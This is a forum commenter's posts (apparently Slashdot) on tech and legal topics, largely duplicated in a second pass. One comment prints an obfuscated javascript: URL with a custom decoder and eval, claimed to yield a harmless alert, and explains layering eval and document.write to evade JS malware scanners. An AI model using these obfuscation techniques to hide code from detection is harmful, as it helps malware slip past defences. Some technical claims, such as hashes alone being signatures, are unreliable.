Ridiculous laws are ridiculous. Face it: Law does not reflect the actual public opinion or values. Since its hard to remove old laws it's easy for the past to hold us prisoners. This is why we should only pass those laws that we really must have forever.
The problem with the Texas law is that it requires "the average person" to apply their own "standards" (read: right wing christians dictate what's decent; Clearly a loophole bypassing Church/State separation).
IMO, non enforcement should be grounds for removal. The Swedish law of latter day rape is largely unenforced as well.
If the governments actually actively and aggressively enforced all the laws of the lands, laws like these would be much easier to overturn.
Unfortunately, law making branches are there to make new laws, they can't be bothered to audit the old ones -- If there are no lobbyists against the old laws, they stay on the books.
How to create a Police State:
1. Create laws that no one obeys. 2. Do not enforce said laws. 3. Wait for someone to do something you don't like. 4. Toss them in jail for breaking one of the laws you don't normally enforce. 5. Oppress!
TFA is wrong, Mozilla has not the right or capability to keep me from using FF in any way I want. I compiled my OS & all the programs on it. Perhaps some FF users imagine themselves under the thumb of Mozilla?
Firefox is open source. If Mozilla refuses to add important features we want, me (or someone like me), will make them available to you in source and binary forms.
Everyone just chill out. If Mozilla is stupid enough to force this crap on its users, competitors will spring up instantly that offer everything Firefox does as well as the privacy tools too (note: there are already forks of FF available, if you care to search).
IMO, Some jag-off is blabbing on the Internet about shit they know nothing about again, BFD. Nothing to see here, move along.
Yep, one of my friends just tagged me in a picture he took of a nude Jamaican sculpture... That's right, I'm the penis... WTF, Facebook. My friends are NOT me, they should not decide what's on my profile page.
Hahahah, even your correction has mathematical error;-P
Software that is 50% complete and ships provides infinitely more functionality to users than software that strives for 100% completeness but never gets shipped.
FTFY
Think about it: shipped to users = (X functionality units) not shipped = (0 functionality units). You're talking percents, not quantized units of functionality. Any positive X is infinity percent greater than 0.
What isn't realized is that I have about 20 half finished (not shipped) projects in my personal repository. I regularly "ship" a product that uses modules developed for another unshipped project.
Therefore:
Software that is 100% complete and ships may provide functionality to users from software that strives for 100% completeness but never gets shipped.
...and...
Software that is 50% complete and ships provides 50% less functionality to users than software that is 100% complete and built with modules from software that never gets shipped.
The important thing to remember is: Try to make code reusable, the current project might not ship; If so you won't have wasted all of your time.
The internet isn't really a place to gain an informed opinion over things.
Yes, you are correct. Opinions should all be tossed out. Pure info is what the Internet is all about. Pick a language and a FOSS project, develop away, it's a great learning process that I've found much more "educational" than formal education.
Just search the web, you'll find everything that any professor will ever be able to teach you online. Need guidance, clarification, or to ask a question? There are free online forums for that too... Yes, the Internet on average, much like the FM band, has more signal than noise, but similarly you can easily tune your into the signal you need.
Consider this: My Java "professor" gave an assignment where we read in rows of data from standard input, and output the table sorted by a certain column's value. He offered extra credit for proper alignment and justification of the table's cells... "WTF? Really?", I thought.
I used the Collections framework along with Swing to provide a GUI w/ sortable & justified JTable columns instead of doing character counting and sending extra spaces with the text to the standard output. He gave me a C. Another student used the Formatter to provide printf style formatting... also got a C, WTF! Go beyond the prof's teachings & expectations to meet a requirement, get a poor grade... That's dumb and counter productive.
In the real world, you try not to re-invent the wheel, this college course was not teaching practical programming; It was so far beneath what I learned already online, on Java's own website, I dropped the course (waste of time). Sure I can write a merge sort, or programatically align console text output, but that was not what the assignment said: "Provide a tabular output sorted by the 'Name' column." We learned merge sort 2 weeks prior, but the "professor" would not move on.
Not having a "degree" myself, I frequently answer questions that "Degree" holding graduates ask in online forums... Why? Because they didn't learn what they needed to know in their courses.
You would be hard pressed to find a programmer that doesn't have some form of documentation open in another window, screen, or context menu while coding. IMO, besides learning about algorithms and complexity, the language specs & online tutorials are all you really need. I find paper books pale in comparison to down-loadable, copy&paste-able free, online resources. Also note: As a programmer you will be expected to keep up to date with the ever changing languages you learn. All of these changes are easily accessible online too.
There's a lot of noise and very little quality signal to use and without having a degree to start with it's pretty much futile in terms of knowing what is and is not reliable information.
I call bullshit. See esp. the Java link above, your arguments are ill-informed, and reek of FUD. Search google for "java tutorial", or "$any_lang tutorial" and you get some pretty damn reliable, pure "signal" information about what you searched for.
Are you really arguing that Language specs & Tutorials from IBM, Microsoft, etc, and docs from a language's main website (such as http://perldoc.perl.org/
When I use NoScript to disable JS for a website, at least I have control over it.
Yeah, sure you do... Funny thing about NoScript, it allows you to run JS on sites you trust.
This is just more security theater; Consider cross site scripting attacks. I've seen XSS attacks on Google, Microsoft, Twitter, Amazon, and many more "reputable" sites that you may "trust".
NoScript security comes from not running JS. If you run any JS, you are then no longer secure. How do you know the JS you just allowed to run on a "trusted" site doesn't contain malware delivered via XSS? You Don't.
Granted, NoScript does increase your security because you're running less JS code, but it does not make you invulnerable to JS exploits unless you never allow JS to run.
The "control" you think you have can be ripped away from you by one XSS attack; So, what control do you actually have?
FTA: "ZOZZLE makes use of a statistical classifier to efficiently identify malicious JavaScript. The classifier needs training data to accurately classify JavaScript source"
It seems that they're using Bayesian (or other) classification techniques like those in spam identification tools. One wonders what percentage of false alarms are going to be set off. When I use NoScript to disable JS for a website, at least I have control over it.
This is a useless endeavor. There is an infinite number of ways to do the same damn thing in JS.
This is valid JavaScript. It is equivalent to pasting the following into your address bar: javascript:alert('Pattern Detection Is Stupid.');
JS has an eval() function. Game over folks. You can encrypt your code, and decrypt it on the fly, then eval it. The above code uses URL encoding and Base64. The above code contains a Base64 decoder along with the data to decode. A base64 encoder/decoder pair can be generated on the fly; each will use a non standard scrambled alphabet.
Base64 was used for simplicity, but RSA, multiple "URL escape" passes, or any other combination of ciphers can be used. Bonus: Ajax can be used to fetch the decryption key which makes it impossible to decode the JS unless the JS is running. Any solution complex enough to detect all JS malware would be equally complex as the JS engine itself.
I can hear some gears beginning to turn: "just intercept the eval calls".
Wrong.
Consider this: document.write( 'alert("Pattern Detection Is Stupid.");' );
You can use document.write to output more JS, that will then be interpreted after the current script block. The output JS, can decode a bit more JS and run it via eval and/or output it again. As many layers as you like can be used. Code can also be obfuscated server side on the fly.
Fix the engine, don't add a filter for it because it's insecure! This is more security theater, just like TSA. We protect against known threats, the evil doers just think of a new way each time that we aren't protecting ourselves against yet. MS should be hardening their JS engine, but code auditing seems to be too much work for them (too bad it's not open source). The solution to terroist bombs is not TSA, it is Explosion Proof Planes & fully automated cockpits (big red button to enable full autopilot). The solution to JS exploits is an Exploit Proof JS Engine & fully isolated VM.
IMO, JS should be properly sandboxed or ditched altogether. For the sake of speed modern browsers compile JS into machine code and run it directly on the metal... That's right folks, all your JS code is inherently a remote code execution!
Hint: Any code running directly on the metal can not be properly sandboxed unless you use a VM. If we're not going to use the hardware VM features we shouldn't be running JS on the metal or you risk an error causing a remote execution exploit.
A simple software VM would be ideal, but a software VM for JS must be complex, and almost as inefficient as interpreting and executing the code inline.
tl;dr: Ditch JS or Sandbox it in proper a VM. Until then our human errors in the JS engines will always lead to vulnerabilities.
Note: If it's not in a VM, I won't ever consider the code to be "sandboxed".
Excuse the reply to self, just to clarify: OpenGL has contexts; these allow individual applications to be "resized, moved around" etc. OpenGL is not synonymous with "Full Screen Renderer."
Ah, see, that's the 800Lb invisible elephant in this discussion, It's there, no one sees it, but we're all talking around it in circles...
I've skimmed through and read most threads above, and it seem that few if any have realized one glaring fact: OpenGL has a Client / Server rendering model.
If we ditch the slow, non-hardware-accelerated 2D graphics API we can gain the performance and capabilities of 3D hardware, AND the ability to render remotely via OpenGL's client/server rendering model.
Considering that OpenGL was designed to allow display forking and render-farming, I'm not sure what people are talking about when they say things like: "if Wayland doesn't get the ability to display applications remotely".
It's not Wayland's job to render remotely, that's the renderer's job! Wayland relies on OpenGL; Client/Server OpenGL drivers can provide blazing fast remote rendering compared to standard VNC pixel scraping. OpenGL is platform independent, and can be used in places that X can't (on Windows). (Yes, you can run an X server layer on top of Windows, but why do so when OpenGL already exists at a lower level?)
Sure X can render remotely too, but if it's just going to be an added layer in the remote rendering stack, why even use it? One of the strong points of FOSS is the ability to choose between unfettered progress and stability. After a while the "bleeding edge" is wiped off and can be safely sheathed as just another tool we all use. Vendor lock in is the reason I ditched Windows. Hanging onto X because "Everything Runs On X" is exactly the opposite response I expected from FOSS users.
And how would you get a virus by just visiting websites?
By "visiting websites" I assume you mean downloading a HTML file along with it's supporting data files such as sound, images, SVG / XML, video, PDFs (via plugin), etc, and displaying the combined content in a browser.
Go ahead and search the web for image/sound/video exploits in IE, Firefox, Safari, and any other browser.
For example, JPG image expolits can infect your computer with malware by simply attempting to decode an image.
Pssst: "Visiting websites" can cause JPG images to be decoded and displayed.
I'll second this. I'm reasonably careful - browse only with Firefox and a handful of extensions, don't use bootleg software, careful about executing anything (unsigned or unknown), and typically stay out of the darker areas of the net. I'd even go as far as to say I think I know what I'm doing.
I still got hit.
Windows users are insane.
"The definition of insanity is doing the same thing over and over and expecting different results." - Benjamin Franklin
Keep running the Most Targeted, and therefore most vulnerable OS. Keep "recovering" from crashes & viruses; Keep putting up with the fact that a constantly running A.V. is essential. Keep feeding the insanity because [insert your excuse here], and Windows is more familiar...
Except that It's not always more familiar. Most laymen I've encountered have just as much (if not more) trouble migrating from XP to Win7 as they do migrating to Linux or OSX.
Oh, right, it's AVG not MS that caused the crash... Tell me: Why was AVG's A.V. product installed? (Just plain insane, I tell you).
AV doesn't protect against most "Zero-Day" exploits; 1 month later your OS is patched against the known exploits... What then is the benefit of running an AV? It protects against unpatched flaws in your OS.
Psst: Instead of developing my own FOSS AV product, I just patch bugs in Linux...
Look at your TV, now back to me; Satellites run on solar power. Look out the window; now back to me; Plants run on solar power. Look at yourself, now back to me; We all depend on solar power in some form, solar is the original and greenest power. I ride to work on a horse.
...to look a bit more like this, Facebook users would have a better idea of what to expect?
Earlier I wrote:
Every time you see the Facebook button Just imagine in its place a knot-hole with a creepy Zuckerberg eye peering out (imaginary muffled fapping noise optional).
I get the impression that blocking/disabling third party cookies solves this, since the cookie is from facebook and I'm looking at $SITEXYZ.
Somewhat, however, fetching the Facebook scripts and/or images sends Facebook your IP & the page you are currently on via HTTP REFERER [sic]. This is not blocked by "blocking/disabling 3rd party cookies", if you're logged in to Facebook and you see a "like" button on another website Facebook knows you were there. If you're not logged in your IP + referring page goes to Facebook and previous login info along with basic link trail tracking or other analytics can probably identify you.
Every time you see the Facebook "like" button Just imagine in its place a knot-hole with a creepy Zuckerberg eye peering out (imaginary muffled fapping noise optional).
Seriously folks, Google's search results are a product of Google and are subject to their whim. They may provide mostly fair results, but does anyone seriously think that any search engine has perfectly fair results?
I don't see why they are obligated at all to treat all websites equally. Infact, I can't think of a single search engine that does treat all sites equal due to "adwords" and other such paid for advertising. Oh, I know, they're "labeled" as ads; Pffft, my grandma doesn't know that; She can't be convinced that the sponsored links aren't the top (and therefore "best") results. Strangely enough, she actually gets what she was searching for.
Screw "fair" results. Pure algorithmic results can and have been abused by link-farms. Google and other search engines manually de-rank link farms. I have personally reported such link-bait and watched them disappear from results the next day. BLAM, there goes your "pure algorithmic results".
Even if Google is being fair in this instance, its best to search multiple engines.
Apps can only see other app's data through APIs that the apps implement. Apps can only access the data that they create, or that which is on the SD card. All other cross application data access is limited to apps that are signed via the same developer cert. A dev can make multiple apps that work together intimately (can see each other's data), but they must be from the same dev. Any other app from a different developer must use the application's public API.
Fact: The firefox installer can see & write to your whole hard drive. Fact: MS, Google & Apple installers can see & write to your whole hard drive (including directories containing FF's data).
Yes, I'm absolutely positive that neither Firefox or Google/MS/Apple/Any applications are truly sandboxed on your OS. Proof? This Article Exists.
Define sandbox.
In my idea of a "sandbox" typing file:///sys/kernel/slab into the address bar should bring up an error page instead of my slabs...
Yeah, I know I can manually run FF under a chroot to create my own sandbox, but NO, FF DOES NOT DO THAT ITSELF.
Why is it even possible to make a plugin/addon install without the user getting asked?
Because all the apps can see eachother's junk.
It's not Firefox's job to sandbox all the applications, that's really the OSs job.
In most desktop OSes, Much like the Internet, security was not a consideration among peers on the platform.
We've sucessfully migrated to multi-user security. The next step is already being taken via sandboxed applications: chroot, Android, iOS.
On an OS that sandboxes all applications, Firefox doesn't have to worry about protecting itself from outsiders, and it shouldn't have to worry about that now.
Applications shouldn't have to focus on features you require from your OS.
Besides, as long as all apps can touch eachother's junk you can't have a proper sandbox as you describe. Certificates and Signing? Pfft. My malicious installer will just replace FF's keys and certs with ones I generate during installation, and I'll just re-sign the whole plugin system with the new keys. FF will see that everything is valid upon start up.
The only other option is requiring the user to input a password to "unlock' Firefox at startup. I already do this because my homepage has a password box, and I use a master password with my saved passwords, but for most users that is a big usability problem -- Remember Vista?
Re: toolbarqueries.clients.google.com -- Don't use Chrome. If you like Chrome use Chomium instead (open source base of Chrome minus secret closed source Google juices).
Re: googlebot -- Sitemaps be damned, use "robots.txt".
It is the fault of others for exploiting it?... How about they fix their exploits instead of pointing fingers.
IMO, this is not an "exploit". Dropping files into the plugins directory is easy by design.
Unwanted application side-effects are the fault of our current computing model whereby any application can see and touch any other application's junk.
To stop this sort of thing we need to change our application model to a sandboxed one, such as: *nix chroot, Android, iOS, etc. I really like Android's "Intents" (Applications can have a public API for talking to other applications).
The real issue at hand is that applications have access to data that we may not want them to access. Currently there is no option to tell our desktop OSs that we want all applications sandboxed, and any cross sandbox activity must be approved by the user.
With a sandboxed approach it will still be simple for the OS, users or developers to drop files into an application's plugin directory.
I can't trust that all applications will strictly follow the Filesystem Hierarchy Standard, and stay out of places they don't belong. Until then I'll keep using the chroot command and/or Virtualbox to create my own sandboxes.
"Encryption" is the wrong word here. What we're talking about is digital signing. The way it would work is that upon installation, the browser would generate a public-private keypair, encrypt the private key with a password of the user's choice, and save the resulting public key and encrypted private key to persistent storage.
No, what you are talking about involves Public-Key Cryptography, aka Encryption. Ergo, Encryption was the correct word in the GP, and you talk about using it extensively yourself.
Digital signatures can be generated without public key algorithms. The algorithms commonly used for signing data are called Message Digest or Fingerprinting algorithms.
MD5, SHA-1, SHA-256, and other such message digest algorithms can be used to digitally sign data.
Hashed Message Authentication Code (HMAC) can be used along with any digest algorithm in order to provide a keyed digest; An identical passphrase and input data is required to generate an identical digest/fingerprint.
Digital Certificates use both public key cryptography and message digest algorithms.
In any event, Encryption is involved, and is therefore not "the wrong word here".
The problem with this is that Assange will be prosecuted for his infidelity, but sentenced for pissing off world superpowers.
Hint: Interpol doesn't normally get involved in gray-area cases of Swedish latter day rape.
When in Rome! You have to deal with the laws where you reside.
In short: Do not do anything in any country if you are not 100% sure that it is legal to do so.
Pffft. Don't believe this "when in rome" crap. Hey, fellow Texan, did you know it's illegal to masturbate, women can't own more than 6 sex toys (intent to distribute obscene devices), and dildos are outright banned in Texas?
Ridiculous laws are ridiculous. Face it: Law does not reflect the actual public opinion or values. Since its hard to remove old laws it's easy for the past to hold us prisoners. This is why we should only pass those laws that we really must have forever.
The problem with the Texas law is that it requires "the average person" to apply their own "standards" (read: right wing christians dictate what's decent; Clearly a loophole bypassing Church/State separation).
IMO, non enforcement should be grounds for removal. The Swedish law of latter day rape is largely unenforced as well.
If the governments actually actively and aggressively enforced all the laws of the lands, laws like these would be much easier to overturn.
Unfortunately, law making branches are there to make new laws, they can't be bothered to audit the old ones -- If there are no lobbyists against the old laws, they stay on the books.
How to create a Police State:
1. Create laws that no one obeys.
2. Do not enforce said laws.
3. Wait for someone to do something you don't like.
4. Toss them in jail for breaking one of the laws you don't normally enforce.
5. Oppress!
And if you believe that, I'm sure that you're either a lawyer or, worse yet, a congressmember.
... or even worse still, a patent examiner.
TFA is wrong, Mozilla has not the right or capability to keep me from using FF in any way I want.
I compiled my OS & all the programs on it. Perhaps some FF users imagine themselves under the thumb of Mozilla?
Firefox is open source. If Mozilla refuses to add important features we want, me (or someone like me), will make them available to you in source and binary forms.
Everyone just chill out. If Mozilla is stupid enough to force this crap on its users, competitors will spring up instantly that offer everything Firefox does as well as the privacy tools too (note: there are already forks of FF available, if you care to search).
IMO, Some jag-off is blabbing on the Internet about shit they know nothing about again, BFD. Nothing to see here, move along.
Yep, one of my friends just tagged me in a picture he took of a nude Jamaican sculpture... That's right, I'm the penis... WTF, Facebook. My friends are NOT me, they should not decide what's on my profile page.
Hahahah, even your correction has mathematical error ;-P
Software that is 50% complete and ships provides infinitely more functionality to users than software that strives for 100% completeness but never gets shipped.
FTFY
Think about it: shipped to users = (X functionality units) not shipped = (0 functionality units). You're talking percents, not quantized units of functionality. Any positive X is infinity percent greater than 0.
What isn't realized is that I have about 20 half finished (not shipped) projects in my personal repository. I regularly "ship" a product that uses modules developed for another unshipped project.
Therefore:
Software that is 100% complete and ships may provide functionality to users from software that strives for 100% completeness but never gets shipped.
...and...
Software that is 50% complete and ships provides 50% less functionality to users than software that is 100% complete and built with modules from software that never gets shipped.
The important thing to remember is: Try to make code reusable, the current project might not ship; If so you won't have wasted all of your time.
The internet isn't really a place to gain an informed opinion over things.
Yes, you are correct. Opinions should all be tossed out. Pure info is what the Internet is all about. Pick a language and a FOSS project, develop away, it's a great learning process that I've found much more "educational" than formal education.
Teach yourself C++: C++ Annotations, C++ Language Tutorial... ... or Perl: Perl programming documentation, or JavaScript,
or Java.
Just search the web, you'll find everything that any professor will ever be able to teach you online. Need guidance, clarification, or to ask a question? There are free online forums for that too... Yes, the Internet on average, much like the FM band, has more signal than noise, but similarly you can easily tune your into the signal you need.
Consider this: My Java "professor" gave an assignment where we read in rows of data from standard input, and output the table sorted by a certain column's value. He offered extra credit for proper alignment and justification of the table's cells... "WTF? Really?", I thought.
I used the Collections framework along with Swing to provide a GUI w/ sortable & justified JTable columns instead of doing character counting and sending extra spaces with the text to the standard output. He gave me a C. Another student used the Formatter to provide printf style formatting... also got a C, WTF! Go beyond the prof's teachings & expectations to meet a requirement, get a poor grade... That's dumb and counter productive.
In the real world, you try not to re-invent the wheel, this college course was not teaching practical programming; It was so far beneath what I learned already online, on Java's own website, I dropped the course (waste of time). Sure I can write a merge sort, or programatically align console text output, but that was not what the assignment said: "Provide a tabular output sorted by the 'Name' column." We learned merge sort 2 weeks prior, but the "professor" would not move on.
Not having a "degree" myself, I frequently answer questions that "Degree" holding graduates ask in online forums... Why? Because they didn't learn what they needed to know in their courses.
You would be hard pressed to find a programmer that doesn't have some form of documentation open in another window, screen, or context menu while coding. IMO, besides learning about algorithms and complexity, the language specs & online tutorials are all you really need. I find paper books pale in comparison to down-loadable, copy&paste-able free, online resources. Also note: As a programmer you will be expected to keep up to date with the ever changing languages you learn. All of these changes are easily accessible online too.
There's a lot of noise and very little quality signal to use and without having a degree to start with it's pretty much futile in terms of knowing what is and is not reliable information.
I call bullshit. See esp. the Java link above, your arguments are ill-informed, and reek of FUD. Search google for "java tutorial", or "$any_lang tutorial" and you get some pretty damn reliable, pure "signal" information about what you searched for.
Are you really arguing that Language specs & Tutorials from IBM, Microsoft, etc, and docs from a language's main website (such as http://perldoc.perl.org/
When I use NoScript to disable JS for a website, at least I have control over it.
Yeah, sure you do... Funny thing about NoScript, it allows you to run JS on sites you trust.
This is just more security theater; Consider cross site scripting attacks. I've seen XSS attacks on Google, Microsoft, Twitter, Amazon, and many more "reputable" sites that you may "trust".
NoScript security comes from not running JS. If you run any JS, you are then no longer secure. How do you know the JS you just allowed to run on a "trusted" site doesn't contain malware delivered via XSS? You Don't.
Granted, NoScript does increase your security because you're running less JS code, but it does not make you invulnerable to JS exploits unless you never allow JS to run.
The "control" you think you have can be ripped away from you by one XSS attack; So, what control do you actually have?
FTA: "ZOZZLE makes use of a statistical classifier to efficiently identify malicious JavaScript. The classifier needs training data to accurately classify JavaScript source"
It seems that they're using Bayesian (or other) classification techniques like those in spam identification tools. One wonders what percentage of false alarms are going to be set off. When I use NoScript to disable JS for a website, at least I have control over it.
This is a useless endeavor. There is an infinite number of ways to do the same damn thing in JS.
Consider the following:
javascript:function%20u64%28s%29%7Bvar%20h%2Co%2Cb%2Cc%2Cp%3Bb%3Dc%3Dp%3D0%3Bo%3D%22%22%3Bwhile%28p%3Cs.length%29%7Bh%3Ds.charCodeAt%28p%29-47%3Bif%28h%3C0%29h%3D0%3Bif%28h%3E10%29h-%3D7%3Bif%28h%3E36%29h-%3D4%3Bif%28h%3E37%29h-%3D1%3Bb%3D%28b%3C%3C6%29%7Ch%3Bc+%3D6%3Bp++%3Bwhile%28c%3E6%29%7Bo+%3DString.fromCharCode%28%28b%3E%3E%28c-7%29%29%26127%29%3Bc-%3D7%7D%7Dreturn%20o%7D%3Beval%28u64%28%22kvBjAccIoBEId_tQZ3IAomsyabUiFHTP1bouwCDGRbJik%22%29%29%3Bvoid%280%29%3B
This is valid JavaScript. It is equivalent to pasting the following into your address bar:
javascript:alert('Pattern Detection Is Stupid.');
JS has an eval() function. Game over folks. You can encrypt your code, and decrypt it on the fly, then eval it. The above code uses URL encoding and Base64. The above code contains a Base64 decoder along with the data to decode. A base64 encoder/decoder pair can be generated on the fly; each will use a non standard scrambled alphabet.
Base64 was used for simplicity, but RSA, multiple "URL escape" passes, or any other combination of ciphers can be used. Bonus: Ajax can be used to fetch the decryption key which makes it impossible to decode the JS unless the JS is running. Any solution complex enough to detect all JS malware would be equally complex as the JS engine itself.
I can hear some gears beginning to turn: "just intercept the eval calls".
Wrong.
Consider this:
document.write( 'alert("Pattern Detection Is Stupid.");' );
You can use document.write to output more JS, that will then be interpreted after the current script block.
The output JS, can decode a bit more JS and run it via eval and/or output it again. As many layers as you like can be used. Code can also be obfuscated server side on the fly.
Fix the engine, don't add a filter for it because it's insecure! This is more security theater, just like TSA. We protect against known threats, the evil doers just think of a new way each time that we aren't protecting ourselves against yet. MS should be hardening their JS engine, but code auditing seems to be too much work for them (too bad it's not open source). The solution to terroist bombs is not TSA, it is Explosion Proof Planes & fully automated cockpits (big red button to enable full autopilot). The solution to JS exploits is an Exploit Proof JS Engine & fully isolated VM.
IMO, JS should be properly sandboxed or ditched altogether. For the sake of speed modern browsers compile JS into machine code and run it directly on the metal... That's right folks, all your JS code is inherently a remote code execution!
Hint: Any code running directly on the metal can not be properly sandboxed unless you use a VM.
If we're not going to use the hardware VM features we shouldn't be running JS on the metal or you risk an error causing a remote execution exploit.
A simple software VM would be ideal, but a software VM for JS must be complex, and almost as inefficient as interpreting and executing the code inline.
tl;dr: Ditch JS or Sandbox it in proper a VM. Until then our human errors in the JS engines will always lead to vulnerabilities.
Note: If it's not in a VM, I won't ever consider the code to be "sandboxed".
Following exact patterns work because that generates the same exact pseudo-random number pool that the ghosts use to pick directions.
Excuse the reply to self, just to clarify: OpenGL has contexts; these allow individual applications to be "resized, moved around" etc. OpenGL is not synonymous with "Full Screen Renderer."
Ah, see, that's the 800Lb invisible elephant in this discussion, It's there, no one sees it, but we're all talking around it in circles...
I've skimmed through and read most threads above, and it seem that few if any have realized one glaring fact:
OpenGL has a Client / Server rendering model.
If we ditch the slow, non-hardware-accelerated 2D graphics API we can gain the performance and capabilities of 3D hardware, AND the ability to render remotely via OpenGL's client/server rendering model.
Considering that OpenGL was designed to allow display forking and render-farming, I'm not sure what people are talking about when they say things like: "if Wayland doesn't get the ability to display applications remotely".
It's not Wayland's job to render remotely, that's the renderer's job! Wayland relies on OpenGL; Client/Server OpenGL drivers can provide blazing fast remote rendering compared to standard VNC pixel scraping. OpenGL is platform independent, and can be used in places that X can't (on Windows). (Yes, you can run an X server layer on top of Windows, but why do so when OpenGL already exists at a lower level?)
Sure X can render remotely too, but if it's just going to be an added layer in the remote rendering stack, why even use it? One of the strong points of FOSS is the ability to choose between unfettered progress and stability. After a while the "bleeding edge" is wiped off and can be safely sheathed as just another tool we all use. Vendor lock in is the reason I ditched Windows. Hanging onto X because "Everything Runs On X" is exactly the opposite response I expected from FOSS users.
We need OpenGL drivers for hardware acceleration anyway (Hell, even phones have OpenGL now), and OpenGL enables remote rendering. Search for yourself
And how would you get a virus by just visiting websites?
By "visiting websites" I assume you mean downloading a HTML file along with it's supporting data files such as sound, images, SVG / XML, video, PDFs (via plugin), etc, and displaying the combined content in a browser.
Go ahead and search the web for image/sound/video exploits in IE, Firefox, Safari, and any other browser.
For example, JPG image expolits can infect your computer with malware by simply attempting to decode an image.
Pssst: "Visiting websites" can cause JPG images to be decoded and displayed.
I'll second this. I'm reasonably careful - browse only with Firefox and a handful of extensions, don't use bootleg software, careful about executing anything (unsigned or unknown), and typically stay out of the darker areas of the net. I'd even go as far as to say I think I know what I'm doing.
I still got hit.
Windows users are insane.
"The definition of insanity is doing the same thing over and over and expecting different results." - Benjamin Franklin
Keep running the Most Targeted, and therefore most vulnerable OS. Keep "recovering" from crashes & viruses; Keep putting up with the fact that a constantly running A.V. is essential. Keep feeding the insanity because [insert your excuse here], and Windows is more familiar...
Except that It's not always more familiar. Most laymen I've encountered have just as much (if not more) trouble migrating from XP to Win7 as they do migrating to Linux or OSX.
Oh, right, it's AVG not MS that caused the crash... Tell me: Why was AVG's A.V. product installed? (Just plain insane, I tell you).
AV doesn't protect against most "Zero-Day" exploits; 1 month later your OS is patched against the known exploits... What then is the benefit of running an AV? It protects against unpatched flaws in your OS.
Psst: Instead of developing my own FOSS AV product, I just patch bugs in Linux...
Look at your TV, now back to me; Satellites run on solar power. Look out the window; now back to me; Plants run on solar power. Look at yourself, now back to me; We all depend on solar power in some form, solar is the original and greenest power. I ride to work on a horse.
Don't click those buttons!
It's not so simple as that. Just the fact that you can see the button is enough to let Facebook track you.
...to look a bit more like this, Facebook users would have a better idea of what to expect?
Earlier I wrote:
Every time you see the Facebook button Just imagine in its place a knot-hole with a creepy Zuckerberg eye peering out (imaginary muffled fapping noise optional).
Feel free to add it to your sites!
I get the impression that blocking/disabling third party cookies solves this, since the cookie is from facebook and I'm looking at $SITEXYZ.
Somewhat, however, fetching the Facebook scripts and/or images sends Facebook your IP & the page you are currently on via HTTP REFERER [sic]. This is not blocked by "blocking/disabling 3rd party cookies", if you're logged in to Facebook and you see a "like" button on another website Facebook knows you were there. If you're not logged in your IP + referring page goes to Facebook and previous login info along with basic link trail tracking or other analytics can probably identify you.
Every time you see the Facebook "like" button Just imagine in its place a knot-hole with a creepy Zuckerberg eye peering out (imaginary muffled fapping noise optional).
Seriously folks, Google's search results are a product of Google and are subject to their whim. They may provide mostly fair results, but does anyone seriously think that any search engine has perfectly fair results?
I don't see why they are obligated at all to treat all websites equally.
Infact, I can't think of a single search engine that does treat all sites equal due to "adwords" and other such paid for advertising. Oh, I know, they're "labeled" as ads; Pffft, my grandma doesn't know that; She can't be convinced that the sponsored links aren't the top (and therefore "best") results. Strangely enough, she actually gets what she was searching for.
Screw "fair" results. Pure algorithmic results can and have been abused by link-farms. Google and other search engines manually de-rank link farms. I have personally reported such link-bait and watched them disappear from results the next day. BLAM, there goes your "pure algorithmic results".
Even if Google is being fair in this instance, its best to search multiple engines.
If only there was some service that allowed me to search multiple engines at once.
You would think that someone would create a Firefox plugin that does this...
Seriously, this is a non issue.
I agree.
This is very similar to what Android does.
Apps can only see other app's data through APIs that the apps implement. Apps can only access the data that they create, or that which is on the SD card. All other cross application data access is limited to apps that are signed via the same developer cert. A dev can make multiple apps that work together intimately (can see each other's data), but they must be from the same dev. Any other app from a different developer must use the application's public API.
I don't "claim" anything. I'm stating facts.
Fact: The firefox installer can see & write to your whole hard drive.
Fact: MS, Google & Apple installers can see & write to your whole hard drive (including directories containing FF's data).
Yes, I'm absolutely positive that neither Firefox or Google/MS/Apple/Any applications are truly sandboxed on your OS. Proof? This Article Exists.
Define sandbox.
In my idea of a "sandbox" typing file:///sys/kernel/slab into the address bar should bring up an error page instead of my slabs...
Yeah, I know I can manually run FF under a chroot to create my own sandbox, but NO, FF DOES NOT DO THAT ITSELF.
Why is it even possible to make a plugin/addon install without the user getting asked?
Because all the apps can see eachother's junk.
It's not Firefox's job to sandbox all the applications, that's really the OSs job.
In most desktop OSes, Much like the Internet, security was not a consideration among peers on the platform.
We've sucessfully migrated to multi-user security. The next step is already being taken via sandboxed applications: chroot, Android, iOS.
On an OS that sandboxes all applications, Firefox doesn't have to worry about protecting itself from outsiders, and it shouldn't have to worry about that now.
Applications shouldn't have to focus on features you require from your OS.
Besides, as long as all apps can touch eachother's junk you can't have a proper sandbox as you describe. Certificates and Signing? Pfft. My malicious installer will just replace FF's keys and certs with ones I generate during installation, and I'll just re-sign the whole plugin system with the new keys. FF will see that everything is valid upon start up.
The only other option is requiring the user to input a password to "unlock' Firefox at startup. I already do this because my homepage has a password box, and I use a master password with my saved passwords, but for most users that is a big usability problem -- Remember Vista?
Re: toolbarqueries.clients.google.com -- Don't use Chrome. If you like Chrome use Chomium instead (open source base of Chrome minus secret closed source Google juices).
Re: googlebot -- Sitemaps be damned, use "robots.txt".
It is the fault of others for exploiting it? ...
How about they fix their exploits instead of pointing fingers.
IMO, this is not an "exploit". Dropping files into the plugins directory is easy by design.
Unwanted application side-effects are the fault of our current computing model whereby any application can see and touch any other application's junk.
To stop this sort of thing we need to change our application model to a sandboxed one, such as: *nix chroot, Android, iOS, etc. I really like Android's "Intents" (Applications can have a public API for talking to other applications).
The real issue at hand is that applications have access to data that we may not want them to access. Currently there is no option to tell our desktop OSs that we want all applications sandboxed, and any cross sandbox activity must be approved by the user.
With a sandboxed approach it will still be simple for the OS, users or developers to drop files into an application's plugin directory.
I can't trust that all applications will strictly follow the Filesystem Hierarchy Standard, and stay out of places they don't belong. Until then I'll keep using the chroot command and/or Virtualbox to create my own sandboxes.
"Encryption" is the wrong word here. What we're talking about is digital signing. The way it would work is that upon installation, the browser would generate a public-private keypair, encrypt the private key with a password of the user's choice, and save the resulting public key and encrypted private key to persistent storage.
No, what you are talking about involves Public-Key Cryptography, aka Encryption. Ergo, Encryption was the correct word in the GP, and you talk about using it extensively yourself.
Digital signatures can be generated without public key algorithms. The algorithms commonly used for signing data are called Message Digest or Fingerprinting algorithms.
MD5, SHA-1, SHA-256, and other such message digest algorithms can be used to digitally sign data.
Hashed Message Authentication Code (HMAC) can be used along with any digest algorithm in order to provide a keyed digest; An identical passphrase and input data is required to generate an identical digest/fingerprint.
Digital Certificates use both public key cryptography and message digest algorithms.
